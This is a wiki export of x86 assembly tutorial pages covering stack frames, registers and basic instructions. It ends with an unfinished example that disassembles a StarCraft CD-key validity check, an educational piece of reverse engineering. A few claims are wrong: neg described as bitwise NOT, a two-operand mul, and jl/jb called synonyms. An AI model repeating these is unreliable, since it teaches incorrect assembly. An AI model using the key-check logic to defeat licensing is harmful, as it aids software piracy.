<tr><br />
<td align='left'>esp + 4, ''ebp - 4''</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan;'>'''''esp ''''', ''ebp - 8''</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 12''</td><br />
<td align='center' style='color: green;'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8, ''ebp - 16''</td><br />
<td align='center' style='color: green;'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401011 add esp, 8 ; Remove the local variables from the stack<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 12, ''ebp + 12''</td><br />
<td align='center' width='100'>addressof(var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp + 8''</td><br />
<td align='center'>addressof(var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', '''''ebp'''''</td><br />
<td align='center'>(ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 4''</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8, ''ebp - 8''</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12, ''ebp - 12''</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16, ''ebp - 16''</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401012 pop ebp ; Restore ebp<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 8</td><br />
<td align='center' width='100'>addressof(var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>addressof(var2)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan;'>'''''esp '''''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center' style='color: green;'>(ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
0x401013 ret ; Return (eax isn't set, so there's no return value)<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 4</td><br />
<td align='center' width='100'>addressof(var1)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center'>addressof(var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center' style='color: green;'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>(ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 28</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
0x400007 add esp, 8 ; Clear the stack<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp - 4</td><br />
<td align='center' width='100'>addressof(var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>addressof(var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>(ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 28</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 32</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 36</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
== Balance ==<br />
<br />
This should be rather obvious from the examples shown above, but it is worth paying special attention to.<br />
<br />
Every function should leave the stack pointer in the exact place it received it. In other words, every amount subtracted from the stack (either by sub or push) ''has to be added to the stack'' (either by add or pop). If it isn't, the return value won't be in the right place and the program will likely crash.<br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Registers&diff=3135Registers2012-01-15T23:18:39Z<p>Killboy: /* esp */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section is the first section specific to assembly. So if you're reading through the full guide, get ready for some actual learning! <br />
<br />
A register is like a variable, except that there are a fixed number of registers. Each register is a special spot in the CPU where a single value is stored. A register is the only place where math can be done (addition, subtraction, etc). Registers frequently hold pointers which reference memory. Movement of values between registers and memory is very common. <br />
<br />
Intel assembly has 8 general purpose 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp. Although any data can be moved between any of these registers, compilers commonly use the same registers for the same uses, and some instructions (such as multiplication and division) can only use the registers they're designed to use. <br />
<br />
Different compilers may have completely different conventions on how the various registers are used. For the purposes of this document, I will discuss the most common compiler, Microsoft's. <br />
<br />
== Volatility ==<br />
Some registers are typically volatile across functions, and others remain unchanged. This is a feature of the compiler's standards and must be looked after in the code, registers are not preserved automatically (although in some assembly languages they are -- but not in x86). What that means is, when a function is called, there is no guarantee that volatile registers will retain their value when the function returns, and it's the function's responsibility to preserve non-volatile registers. <br />
<br />
The conventions used by Microsoft's compiler are:<br />
* '''Volatile''': ecx, edx<br />
* '''Non-Volatile''': ebx, esi, edi, ebp<br />
* '''Special''': eax, esp (discussed later)<br />
<br />
== General Purpose Registers ==<br />
This section will look at the 8 general purpose registers on the x86 architecture. For special purpose and floating point registers, have a look at the [http://en.wikipedia.org/wiki/IA-32 Wikipedia Article] or other reference sites. <br />
<br />
=== eax ===<br />
eax is a 32-bit general-purpose register with two common uses: to store the return value of a function and as a special register for certain calculations. It is technically a volatile register, since the value isn't preserved. Instead, its value is set to the return value of a function before a function returns. Other than esp, this is probably the most important register to remember for this reason. eax is also used specifically in certain calculations, such as multiplication and division, as a special register. That use will be examined in the instructions section. <br />
<br />
Here is an example of a function returning in C:<br />
return 3; // Return the value 3<br />
<br />
Here's the same code in assembly:<br />
mov eax, 3 ; Set eax (the return value) to 3<br />
ret ; Return<br />
<br />
=== ebx ===<br />
ebx is a non-volatile general-purpose register. It has no specific uses, but is often set to a commonly used value (such as 0) throughout a function to speed up calculations. <br />
<br />
=== ecx ===<br />
ecx is a volatile general-purpose register that is occasionally used as a function parameter or as a loop counter. <br />
<br />
Functions of the "__fastcall" convention pass the first two parameters to a function using ecx and edx. Additionally, when calling a member function of a class, a pointer to that class is often passed in ecx no matter what the calling convention is. <br />
<br />
Additionally, ecx is often used as a loop counter. ''for'' loops generally, although not always, set the accumulator variable to ecx. ''rep-'' instructions also use ecx as a counter, automatically decrementing it till it reaches 0. This class of function will be discussed in a later section. <br />
<br />
=== edx ===<br />
edx is a volatile general-purpose register that is occasionally used as a function parameter. Like ecx, edx is used for "__fastcall" functions. <br />
<br />
Besides fastcall, edx is generally used for storing short-term variables within a function. <br />
<br />
=== esi ===<br />
esi is a non-volatile general-purpose register that is often used as a pointer. Specifically, for "rep-" class instructions, which require a source and a destination for data, esi points to the "source". esi often stores data that is used throughout a function because it doesn't change. <br />
<br />
=== edi ===<br />
edi is a non-volatile general-purpose register that is often used as a pointer. It is similar to esi, except that it is generally used as a destination for data. <br />
<br />
=== ebp === <br />
ebp is a non-volatile general-purpose register that has two distinct uses depending on compile settings: it is either the frame pointer or a general purpose register. <br />
<br />
If compilation is not optimized, or code is written by hand, ebp keeps track of where the stack is at the beginning of a function (the stack will be explained in great detail in a later section). Because the stack changes throughout a function, having ebp set to the original value allows variables stored on the stack to be referenced easily. This will be explored in detail when the stack is explained. <br />
<br />
If compilation is optimized, ebp is used as a general register for storing any kind of data, while calculations for the stack pointer are done based on the stack pointer moving (which gets confusing -- luckily, IDA automatically detects and corrects a moving stack pointer!)<br />
<br />
=== esp ===<br />
esp is a special register that stores a pointer to the bottom of the stack (the stack grows towards lower addresses). Math is rarely done directly on esp, and the value of esp must be the same at the beginning and the end of each function. esp will be examined in much greater detail in a later section.<br />
<br />
=== flags ===<br />
In the flags register, each bit has a specific meaning and they are used to store meta-information about the results of previous operations. For example, whether the last calculation overflowed the register or whether the operands were equal. Our interest in the flags register is usually around the cmp and test operations which will commonly set or unset the zero, carry and overflow flags.<br />
These flags will then be tested by a conditional jump which may be controlling program flow or a loop.<br />
<br />
== 16-bit and 8-bit Registers ==<br />
<br />
In addition to the 8 32-bit registers available, there are also a number of 16-bit and 8-bit registers. The confusing thing about these registers it that they use the same storage space as the 32-bit registers. In other words, every 16-bit register is half of one of the 32-bit registers, so that changing the 16-bit also changes the 32-bit. Furthermore, the 8-bit registers are part of the 16-bit registers. <br />
<br />
For example, eax is a 32-bit register. The lower half of eax is ax, a 16-bit register. ax is divided into two 8-bit registers, ah and al (a-high and a-low). <br />
<br />
* There are 8 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp.<br />
* There are 8 16-bit registers: ax, bx, cx, dx, si, di, bp, sp.<br />
* There are 8 8-bit registers: ah, al, bh, bl, ch, cl, dh, dl. <br />
<br />
The relationships of these registers is shown in the table below:<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0' width='485'><br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>eax</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ecx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>ax</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>cx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>dx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>8-bit</td><br />
<br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ah</td><br />
<td colspan='1' width='25' align='center'>al</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>bh</td><br />
<td colspan='1' width='25' align='center'>bl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ch</td><br />
<td colspan='1' width='25' align='center'>cl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>dh</td><br />
<td colspan='1' width='25' align='center'>dl</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='20'>&nbsp;</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>esi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebp</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>esp</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>si</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>di</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bp</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>sp</td><br />
</tr><br />
</table><br />
<br />
Here are two examples:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>eax</td><br />
<td width='100'>0x12345678</td><br />
</tr><br />
<tr><br />
<td>ax</td><br />
<td>0x5678</td><br />
</tr><br />
<tr><br />
<td>ah</td><br />
<td>0x56</td><br />
</tr><br />
<tr><br />
<td>al</td><br />
<td>0x78</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>ebx</td><br />
<td width='100'>0x00000025</td><br />
</tr><br />
<tr><br />
<td>bx</td><br />
<td>0x0025</td><br />
</tr><br />
<tr><br />
<td>bh</td><br />
<td>0x00</td><br />
</tr><br />
<tr><br />
<td>bl</td><br />
<td>0x25</td><br />
</tr><br />
</table><br />
<br />
== 64-bit Registers ==<br />
<br />
A 64-bit register is made by concatenating a pair of 32-bit registers. This is shown by putting a colon between them. <br />
<br />
The most common 64-bit register (used for operations such as division and multiplication) is edx:eax. This means that the 32-bits of edx are put in front of the 32-bits of eax, creating a double-long register, so to speak. <br />
<br />
Here is a simple example:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='80'>edx</td><br />
<td width='200'>0x11223344</td><br />
</tr><br />
<tr><br />
<td>eax</td><br />
<td>0xaabbccdd</td><br />
</tr><br />
<tr><br />
<td>edx:eax</td><br />
<td>0x11223344aabbccdd</td><br />
</tr><br />
</table><br />
<br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Simple_Instructions&diff=3134Simple Instructions2012-01-15T22:53:01Z<p>Killboy: /* shl, shr, sal, sar */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section will go over some basic assembly instructions that you will likely see frequently. Some of the functions shown here are tricky, and some have special properties (such as the registers they use). Additionally, x86 assembly is comprised of hundreds of different instructions. As a result, you will likely want to find a complete reference book or website to have alongside you. This page however, will give enough of an introduction to get you started. <br />
<br />
== Pointers and Dereferencing==<br />
First, we will start with the hard stuff. If you understood the pointers section, this shouldn't be too bad. If you didn't, you should probably go back and refresh your memory. <br />
<br />
Recall that a pointer is a data type that stores an address as its value. Since registers are simply 32-bit values with no actual types, any register may or may not be a pointer, depending on what is stored. It is the responsibility of the program to treat pointers as pointers and to treat non-pointers as non-pointers. <br />
<br />
If a value is a pointer, it can be dereferenced. Recall that dereferencing a pointer retrieves the value stored at the address being pointed to. In assembly, this is generally done by putting square brackets ("[" and "]") around the register. For example:<br />
* eax -- is the value stored in eax<br />
* [eax] -- is the value pointed to by eax<br />
This will be thoroughly discussed in upcoming sections.<br />
<br />
== Doing Nothing ==<br />
The ''nop'' instruction is probably the simplest instruction in assembly. nop is short for "no operation" and it does nothing. This instruction is used for padding. <br />
<br />
== Moving Data Around ==<br />
The instructions in this section deal with relocating numbers and pointers. <br />
<br />
=== mov, movsx, movzx ===<br />
''mov'' is the instruction used for assignment, analogous to the "=" sign in most languages. mov can move data between a register and memory, two registers, or a constant to a register. Here are some examples:<br />
mov eax, 1 ; set eax to 1 (eax = 1)<br />
mov edx, ecx ; set edx to whatever ecx is (edx = ecx)<br />
mov eax, 18h ; set eax to 0x18<br />
mov eax, [ebx] ; set eax to the value in memory that ebx is pointing at<br />
mov [ebx], 3 ; move the number 3 into the memory address that ebx is pointing at<br />
<br />
''movsx'' and ''movzx'' are special versions of mov which are designed to be used between signed (movsx) and unsigned (movzx) registers of different sizes. <br />
<br />
''movsx'' means ''move with sign extension''. The data is moved from a smaller register into a bigger register, and the sign is preserved by either padding with 0's (for positive values) or F's (for negative values). Here are some examples:<br />
* '''0x1000''' becomes '''0x00001000''', since it was positive<br />
* '''0x7FFF''' becomes '''0x00007FFF''', since it was positive<br />
* '''0xFFFF''' becomes '''0xFFFFFFFF''', since it was negative (note that 0xFFFF is -1 in 16-bit signed, and 0xFFFFFFFF is -1 in 32-bit signed)<br />
* '''0x8000''' becomes '''0xFFFF8000''', since it was negative (note that 0x8000 is -32768 in 16-bit signed, and 0xFFFF8000 is -32768 in 32-bit signed)<br />
<br />
''movzx'' means ''move with zero extension''. The data is moved from a smaller register into a bigger register, and the sign is ignored. Here are some examples:<br />
* '''0x1000''' becomes '''0x00001000'''<br />
* '''0x7FFF''' becomes '''0x00007FFF'''<br />
* '''0xFFFF''' becomes '''0x0000FFFF'''<br />
* '''0x8000''' becomes '''0x00008000'''<br />
<br />
=== lea ===<br />
''lea'' is very similar to mov, except that math can be done on the original value before it is used. The "[" and "]" characters always surround the second parameter, but in this case they ''do not indicate dereferencing'', it is easiest to think of them as just being part of the formula. <br />
<br />
lea is generally used for calculating array offsets, since the address of an element of the array can be found with [arraystart + offset*datasize]. lea can also be used for quickly doing math, often with an addition and a multiplication. Examples of both uses are below. <br />
<br />
Here are some examples of using lea:<br />
lea eax, [eax+eax] ; Double the value of eax -- eax = eax * 2<br />
lea edi, [esi+0Bh] ; Add 11 to esi and store the result in edi<br />
lea eax, [esi+ecx*4] ; This is generally used for indexing an array of integers. esi is a <br />
pointer to the beginning of an array, and ecx is the index of the <br />
element that is to be retrieved. The index is multiplied by 4 <br />
because Integers are 4 bytes long. eax will end up storing the <br />
address of the ecx'th element of the array. <br />
<br />
lea edi, [eax+eax*2] ; Triple the value of eax -- eax = eax * 3<br />
lea edi, [eax+ebx*2] ; This likely indicates that eax stores an array of 16-bit (2 byte) <br />
values, and that ebx is an offset into it. Note the similarities <br />
between this and the previous example: the same math is being done, <br />
but for a different reason. <br />
<br />
== Math and Logic ==<br />
The instructions in this section deal with math and logic. Some are simple, and others (such as multiplication and division) are pretty tricky. <br />
<br />
=== add, sub ===<br />
A register can have either another register, a constant value, or a pointer added to or subtracted from it. The syntax of addition and subtraction is fairly simple:<br />
add eax, 3 ; Adds 3 to eax -- eax = eax + 3<br />
add ebx, eax ; Adds the value of eax to ebx -- ebx = ebx + eax<br />
sub ecx, 3 ; Subtracts 3 from ecx -- ecx = ecx - 3<br />
<br />
=== inc, dec ===<br />
These instructions simply increment and decrement a register. <br />
inc eax ; eax++<br />
dec ecx ; ecx--<br />
<br />
=== and, or, xor, neg ===<br />
All logical instructions are bitwise. If you don't know what "bitwise arithmetic" means, you should probably look it up. The simplest way of thinking of this is that each bit in the two operands has the operation done between them, and the result is stored in the first one. <br />
<br />
The instructions are pretty self-explanatory: and does a bitwise 'and', or does a bitwise 'or', xor does a bitwise 'xor', and neg does a bitwise negation.<br />
<br />
Here are some examples:<br />
and eax, 7 ; eax = eax & 7 -- because 7 is 000..000111, this clears all bits <br />
except for the last three. <br />
or eax, 16 ; eax = eax | 16 -- because 16 is 000..00010000, this sets the 5th <br />
bit from the right to "1". <br />
xor eax, 1 ; eax = eax ^ 1 -- this toggles the right-most bit in eax, 0=>1 or <br />
1=>0.<br />
xor eax, FFFFFFFFh ; eax = eax ^ 0xFFFFFFFF -- this toggles every bit in eax, which is <br />
identical to a bitwise negation.<br />
neg eax ; eax = ~eax -- inverts every bit in eax, same as the previous.<br />
xor eax, eax ; eax = 0 -- this clears eax quickly, and is extremely <br />
common.<br />
<br />
=== mul, imul, div, idiv, cdq ===<br />
Multiplication and division are the trickiest operations commonly used, because of how they deal with overflow issues. Both multiplication and division make use of the 64-bit register edx:eax. <br />
<br />
''mul'' multiplies the unsigned value in eax with the operand, and stores the result in the 64-bit pointer edx:eax. ''imul'' does the same thing, except the value is signed. Here are some examples of mul:<br />
mul ecx ; edx:eax = eax * ecx (unsigned)<br />
imul edx ; edx:eax = eax * edx (signed)<br />
<br />
When used with two parameters, ''mul'' instead multiplies the first by the second as expected:<br />
mul ecx, 10h ; ecx = ecx * 0x10 (unsigned)<br />
imul ecx, 20h ; ecx = ecx * 0x20 (signed)<br />
<br />
''div'' divides the 64-bit value in edx:eax by the operand, and stores the quotient in eax. The remainder (modulus) is stored in edx. In other words, div does both division and modular division, at the same time. Typically, a program will only use one or the other, so you will have to check which instructions follow to see whether eax or edx is saved. Here are some examples:<br />
div ecx ; eax = edx:eax / ecx (unsigned)<br />
; edx = edx:eax % ecx (unsigned)<br />
<br />
idiv ecx ; eax = edx:eax / ecx (signed)<br />
; edx = edx:eax % ecx (signed)<br />
<br />
''cdq'' is generally used immediately before idiv. It stands for "convert double to quad." In other words, convert the 32-bit value in eax to the 64-bit value in edx:eax, overwriting anything in edx with either 0's (if eax is positive) or F's (if eax is negative). This is very similar to movsx, above. <br />
<br />
''xor edx, edx'' is generally used immediately before div. It clears edx to ensure that no leftover data is divided. <br />
<br />
Here is a common use of cdq and idiv:<br />
mov eax, 1007 ; 1007 will be divided<br />
mov ecx, 10 ; .. by 10<br />
cdq ; extends eax into edx<br />
idiv ecx ; eax will be 1007/10 = 100, and edx will be 1007%10 = 7<br />
<br />
Here is a common use of xor and div (the results are the same as the previous example):<br />
mov eax, 1007<br />
mov ecx, 10<br />
xor edx, edx<br />
div ecx<br />
<br />
== shl, shr, sal, sar ==<br />
shl - shift left, shr - shift right.<br />
<br />
sal - shift arithmetic left, sar - shift arithmetic right.<br />
<br />
These are used to do a binary shift, equivalent to the C operations << and >>.<br />
They each take two operations: the register to use, and the number of places to shift the value in the register. As computers operate in base 2, these commands can be used as a faster replacement for multiplication/division operations involving powers of 2.<br />
<br />
Divide by 2 (unsigned):<br />
mov eax, 16 ; eax = 16<br />
shr eax, 1 ; eax = 8<br />
<br />
Multiply by 4 (signed):<br />
mov eax, 5 ; eax = 5<br />
sal eax, 2 ; eax = 20<br />
<br />
Visualising the bits moving:<br />
mov eax, 7 ; = 0000 0111 (7)<br />
shl eax, 1 ; = 0000 1110 (14)<br />
shl eax, 2 ; = 0011 1000 (56)<br />
shr eax, 1 ; = 0001 1100 (28)<br />
<br />
== Jumping Around ==<br />
Instructions in this section are used to compare values and to make jumps. These jumps are used for calls, if statements, and every type of loop. The operand for most jump instructions is the address to jump to. <br />
<br />
=== jmp ===<br />
''jmp'', or jump, sends the program execution to the specified address no matter what. Here is an example:<br />
jmp 1400h ; jump to the address 0x1400<br />
<br />
=== call, ret ===<br />
''call'' is similar to jump, except that in addition to sending the program to the specified address, it also saves ("pushes") the address of the executable instruction onto the stack. This will be explained more in a later section. <br />
<br />
''ret'' removes ("pops") the first value off of the stack, and jumps to it. In almost all cases, this value was placed onto the stack by the call instruction. If the stack pointer is at the wrong location, or the saved address was overwritten, ret attempts to jump to an invalid address which usually crashes the program. In some cases, it may jump to the wrong place where the program will almost inevitably crash. <br />
<br />
''ret'' can also have a parameter. This parameter is added to the stack immediately after ret executes its jump. This addition allows the function to remove values that were pushed onto the stack. This will be discussed in a later section. <br />
<br />
The combination of ''call'' and ''ret'' are used to implement functions. Here is an example of a simple function:<br />
<br />
<pre> call 4000h<br />
...... ; any amount of code<br />
4000h:<br />
mov eax, 1<br />
ret ; Because eax represents the return value, this function would return 1, and <br />
nothing else would happen<br />
</pre><br />
<br />
=== cmp, test ===<br />
''cmp'', or compare, compares the two operands and sets a number of flags in a special-purpose register based on the result. Specialized jump commands can check these flags to jump on certain conditions. One way of remembering how ''cmp'' works is to think of it as subtracting the second parameter from the first, comparing the result to 0, and throwing away the result. <br />
<br />
''test'' is very similar to ''cmp'', except that it performs a bitwise 'and' operation between the two variables (and throws away the result), and compares it to zero. ''test'' is most commonly used to compare a variable to itself to check if it's zero. <br />
<br />
Here are the most common flags:<br />
* Zero -- set if and only if the two elements are equal (ie, if the resultant operation was equal to zero)<br />
* Greater than -- set if the first element is greater than the second (ie, if the resultant operation was greater than zero)<br />
* Less than -- set if the first element is less than the second (ie, if the resultant operation was less than zero)<br />
<br />
Flags are set by most arithmetic commands. The most commonly used commands used for comparisons are cmp, inc, and dec.<br />
<br />
=== jz/je, jnz/jne, jl/jb, jg, jle, jge ===<br />
* ''jz'' and ''je'' (which are synonyms) will jump to the address specified if and only if the 'zero' flag is set, which indicates that the two values were equal. In other words, "jump if equal". <br />
* ''jnz'' and ''jne'' (which are also synonyms) will jump to the address specified if and only if the 'zero' flag is not set, which indicates that the two values were not equal. In other words, "jump if different". <br />
* ''jl'' and ''jb'' (which are synonyms) jumps if the first parameter is less than the second. <br />
* ''jg'' jumps if the first parameter is greater than the second. <br />
* ''jle'' jumps if the 'less than' or the 'zero' flag is set, so "less than or equal to". <br />
* ''jge'' jumps if the first is "greater than or equal to" the second.<br />
<br />
These jumps are all used to implement various loops and conditions. For example, here is some C code:<br />
if(a == 3)<br />
b;<br />
else<br />
c;<br />
And here is how it might look in assembly (not exactly assembly, but this is an example):<br />
10 cmp a, 3<br />
20 jne 50<br />
30 b<br />
40 jmp 60<br />
50 c<br />
60<br />
<br />
Here is an example of a loop in C:<br />
for(i = 0; i < 5; i++)<br />
{<br />
a;<br />
b;<br />
}<br />
And here is the equivalent loop in assembly:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 inc ecx<br />
50 cmp ecx, 5<br />
60 jl 20<br />
<br />
== Manipulating the Stack ==<br />
Functions in this section are used for adding and removing data from the stack. The stack will be examined in detail in a later section; this section will simply show some commonly used commands. <br />
<br />
=== push, pop ===<br />
''push'' decrements the stack pointer by the size of the operand, then saves the operand to the new address. This line:<br />
push ecx<br />
Is functionally equivalent to:<br />
sub esp, 4<br />
mov [esp], ecx<br />
<br />
''pop'' sets the operand to the value on the stack, then increments the stack pointer by the size of the operand. This assembly:<br />
pop ecx<br />
Is functionally equivalent to:<br />
mov ecx, [esp]<br />
add esp, 4<br />
<br />
This will be examined in detail in the Stack section of this tutorial.<br />
<br />
=== pushaw, pushad, popaw, popad ===<br />
''pushaw'' and ''pushad'' save all 16-bit or 32-bit registers (respectively) onto the stack. <br />
<br />
''popaw'' and ''popad'' restore all 16-bit or 32-bit registers from the stack. <br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, and I will do my best to answer them; however, you may need to contact me to let me know that a question exists.<br />
<br />
Further explain bitwise<br />
<br />
In your example code:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 cmp ecx, 5<br />
50 jl 20<br />
Wont this just loop forever because ecx is never incremented? Total noob here so i may have missed something obvious.<br />
*** Yes, my mistake. <br />
<br />
Indeed, would not this be more accurate?:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 inc ecx<br />
50 comp ecx, 5<br />
60 jl 20<br />
*** Changed. <br />
<br />
Also, The stack is decremented when pushed, but increased when poped? Isn't this counterintuitive?<br />
*** Yes, the stack starts high and grows downwards. Welcome to x86 assembler!</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Example_1&diff=3133Example 12012-01-14T05:23:48Z<p>Killboy: /* Reduced C Code */</p>
<hr />
<div>{{Infobox assembly}}<br />
[[Category: Assembly Examples]]<br />
<br />
Welcome to the first assembly example! If you have read and understood all the sections up to here, there will not be any surprises. <br />
<br />
The code shown below verifies that a CDKey is valid to install the game with. If the CDKey fails to pass this check, the CDKey may not be used to install the game. Whether this succeeds or fails has no bearing on whether the CDKey is valid to log onto Battle.net with. <br />
<br />
The way one should approach this is to to do the following:<br />
# Copy all the assembly code to your IDE or somewhere safe. <br />
# Go through each line, and make a note of what it does (typically, putting a ; at the end and adding a comment works well). Try and understand what the code is doing. <br />
# Go through each line, and convert it to the equivalent C code (or Java, if you're more comfortable with that). <br />
# Try and combine and reduce the code to make it as simple as possible. <br />
<br />
I'll go through those steps here, hopefully to give an idea of how to approach a function such as this. I highly recommend you try it yourself first, though. <br />
<br />
== Code ==<br />
<pre><br />
; Note: ecx is a pointer to a 13-digit Starcraft cdkey<br />
; This is a function that returns 1 if it's a valid key, or 0 if it's invalid<br />
mov eax, 3<br />
mov esi, ecx<br />
xor ecx, ecx<br />
Top:<br />
movsx edx, byte ptr [ecx+esi]<br />
sub edx, 30h<br />
lea edi, [eax+eax]<br />
xor edx, edi<br />
add eax, edx<br />
inc ecx<br />
cmp ecx, 0Ch<br />
jl short Top<br />
<br />
xor edx, edx<br />
mov ecx, 0Ah<br />
div ecx<br />
<br />
movsx eax, byte ptr [esi+0Ch]<br />
add edx, 30h<br />
cmp eax, edx<br />
